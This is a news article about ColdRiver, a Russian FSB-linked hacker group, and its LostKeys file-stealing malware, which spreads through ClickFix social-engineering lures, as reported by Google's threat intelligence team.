Careful! Russian Malware 'LostKeys' Can Suction Personal Files Secretly!

JAKARTA - The state-backed Russian hacker group, ColdRiver, is known to be using a new malware called LostKeys in an espionage attack against Western entities. The Google Threat Intelligence Team (GTIG) found this tool used in a social engineering scheme to steal files and system data.

ColdRiver has ties to Russia's Federal Security Agency (FSB), and the US State Department is offering millions of dollars in rewards for information that could reveal the group.

The shadowing world of cyber espionage now has a new player: a cunning malware dubbed LostKeys. According to Google, a country hacker group called ColdRiver has been using LostKeys since the beginning of this year to spy on Western governments, journalists, think tank, and non-governmental organizations (NGOs).

ColdRiver itself is not a new name. In December 2024, Britain together with the 'Five Eyes' intelligence alliance directly accused this group of being a digital espionage actor. ColdRiver has direct ties to FSB, Russia's domestic intelligence and security agency.

GTIG first detected LostKeys in January. This malware was used by ColdRiver in a targeted attack titled ClickFix. This attack is basically a digital scam with social engineering techniques, in which victims are persuaded to run malicious PowerShell scripts.

Once run, the script will download and execute additional scripts to install LostKeys. This malware is identified as a Visual Basic Script (VBS)-based data thief malware, which is capable of extracting certain files and folders, sending system information, and executing additional commands to attacker servers.

Usually, ColdRiver steals login credentials to access the victim's email and contact list. However, they are also known to have used another malware called SPICA to steal documents. LostKeys appears to be used in more specific and selective cases, making it a special tool for ColdRiver intelligence operations.

Interestingly, ColdRiver isn't the only group to use the ClickFix method. Other state-sponsored groups such as Kimsuky (North Korea), MuddyWater (Iran), and other Russian actors such as APT28 and UNK_RemoteRogue also used similar tactics in their recent espionage campaign.

ColdRiver, also known by other names such as Star Blizzard and Callisto Group, has honed social engineering capabilities and open source intelligence gatherings since at least 2017. Their targets include defense organizations, governments, and political figures. Their attacks have increased sharply since Russia's invasion of Ukraine, even extending to defense industry facilities and the US Department of Energy.

The US government has imposed sanctions on several ColdRiver members, including one suspected of being an FSB officer. Currently, US authorities are offering huge prizes of up to $10 million to anyone who can provide information to track down other members showing how serious the threat this group poses.